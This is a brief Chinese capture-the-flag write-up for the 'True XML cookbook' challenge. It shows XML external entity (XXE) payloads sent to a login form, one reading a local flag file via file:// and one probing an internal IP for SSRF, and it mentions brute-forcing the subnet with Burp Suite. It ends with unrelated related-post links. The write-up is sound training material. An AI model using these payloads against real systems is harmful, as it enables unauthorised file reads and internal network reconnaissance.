True XML cookbook

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
朝新_12 小时前
【实战】动态 SQL + 统一 Result + 登录校验:图书管理系统(下)
xml·java·数据库·sql·mybatis
百***37482 天前
【mybatis】基本操作:详解Spring通过注解和XML的方式来操作mybatis
xml·spring·mybatis
2501_907136822 天前
发票识别工具,支持xml、pdf、ofd文件
xml·pdf·软件需求
坚持就完事了3 天前
XML的了解
xml
秋月的私语4 天前
批量格式化XML与JSON文件小工具
xml·json
还算善良_5 天前
XML签名
xml·java·开发语言
梅梅绵绵冰5 天前
xml方式实现AOP
xml·java·开发语言
一条晓鱼7 天前
repo xml语法
xml
萝卜白菜。9 天前
关于Java EE应用中xml解析类的问题
xml·java·java-ee
ejinxian10 天前
protobuf 、JSON、XML传输格式
xml·json·protobuf